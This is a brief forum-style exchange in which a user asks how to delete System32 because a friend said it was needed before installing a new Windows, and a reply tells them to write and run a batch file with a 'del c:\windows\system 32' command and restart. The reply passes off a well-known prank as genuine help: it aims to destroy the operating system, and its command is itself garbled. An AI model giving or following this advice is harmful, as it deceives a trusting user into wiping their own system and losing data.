How do I delete System 32?

A friend told me I had to delete system 32 before I can download the new windows but I cant figure it out. Pls help

Type in notepad

@echo off del c:\\windows\system 32

Save as whatever you want to name it, save as all types and make it a .bat file. Open it after it's saved and restart your computer.
